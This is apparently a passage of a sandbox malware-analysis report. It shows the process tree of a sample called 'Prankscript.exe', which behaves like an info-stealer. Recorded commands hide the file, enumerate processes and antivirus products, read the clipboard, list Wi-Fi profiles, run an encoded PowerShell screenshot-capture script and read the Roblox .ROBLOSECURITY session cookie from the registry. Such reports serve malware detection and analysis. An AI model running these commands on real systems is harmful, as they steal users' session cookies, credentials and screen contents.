        PID:2044
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4904 /prefetch:8
        7⤵
        
        PID:3320
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4980
        
        C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4872
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
        7⤵
        
        PID:492
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
        7⤵
        
        PID:4392
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
        7⤵
        
        PID:2728
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
        7⤵
        
        PID:240
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2912 /prefetch:1
        7⤵
        
        PID:3456
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
        7⤵
        
        PID:4324
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6540 /prefetch:8
        7⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:1028
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5532 /prefetch:8
        7⤵
        
        PID:3012
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:1
        7⤵
        
        PID:2668
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6844 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2512
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6640 /prefetch:1
        7⤵
        
        PID:4888
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
        7⤵
        
        PID:4468
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
        7⤵
        
        PID:3200
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
        7⤵
        
        PID:1212
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13191554306330074829,16488558800414902637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
        7⤵
        
        PID:4680
      - C:\Windows\System32\notepad.exe
        
        "C:\Windows\System32\notepad.exe"
        6⤵
        
        PID:3816
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/9xkQWvzcbk
        6⤵
        
        PID:3628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f2b23cb8,0x7ff8f2b23cc8,0x7ff8f2b23cd8
        7⤵
        
        PID:4940
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/m0c5o
        6⤵
        
        PID:1520
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f2b23cb8,0x7ff8f2b23cc8,0x7ff8f2b23cd8
        7⤵
        
        PID:408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3184
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
      4⤵
      Views/modifies file attributes
      PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1752
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2012
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4324
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1164
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3804
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3192
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xmqdzqwn\xmqdzqwn.cmdline"
        5⤵
        
        PID:4716
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D41.tmp" "c:\Users\Admin\AppData\Local\Temp\xmqdzqwn\CSCE0D3C25771A54F0E988E502F7557DB5C.TMP"
        6⤵
        
        PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2328
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3748
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1996
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2812
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4772
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
